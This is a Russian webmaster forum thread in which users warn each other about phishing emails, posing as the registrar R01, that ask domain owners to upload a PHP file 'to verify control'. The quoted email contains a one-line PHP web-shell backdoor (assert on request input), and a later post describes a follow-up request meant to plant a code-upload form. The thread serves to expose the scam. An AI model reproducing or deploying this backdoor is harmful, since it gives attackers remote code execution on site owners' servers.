- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Случилась такая ржака, что спешу поделиться. Сегодня получил письмо следующего содержания, якобы от регистратора R01:
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом ******.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a18nebqk8qjqzhe8.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 13 июня 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
угу, старый развод...
Да, странно, как я это пропустил... Наверное, чем-то занят был, а сегодня и до меня черёд дошёл. Ну ничего, повторенье - мать ученья. :)
Вчера была свежая тема
Короче, жульё активизировалось. Первая тема была в ветке "Хостинг", вторая - "Доменные имена", теперь и в "Безопасности" пусть побудет. По первой теме я понял, что и в самом деле находятся люди, которые ведутся на такие письма. К сожалению. Так что для кого-то не такая уж и ржака:o.
"Съесть-то он съест, да хто ж ему даст":)
"Съесть-то он съест, да хто ж ему даст"
Ну кто-то же ведется если уже не первый год такое рассылают. Мне уже раз десять приходило типа от разных регистраторов.
Сегодня бум какой-то... Пришло штук на 10 доменов за сутки.
Точно бум. Сегодня мне на другой домен письмо пришло.
хм.. +2 свалилось предложения тоже :)
Любопытства ради проверил, насколько серьёзны требования, изложенные в письме. Я должен был создать файл в течение 3-х дней - и ребята оказались довольно пунктуальны. Через 4 дня на оба сайта прилетел POST-запрос, в результате которого предполагалось создание файла menuform.php, который в свою очередь представляет из себя форму с единственным полем для отправки кода на сайт и обработчик этой формы. Использование этого файла посторонними лицами исключено (вот блин жадюги 😒), так как для этого надо отправлять строго определённую последовательность символов.
Сервер отправителя расположен в Сиэтле (Amazon Technologies Inc.). Опять эти американские хакеры 😂.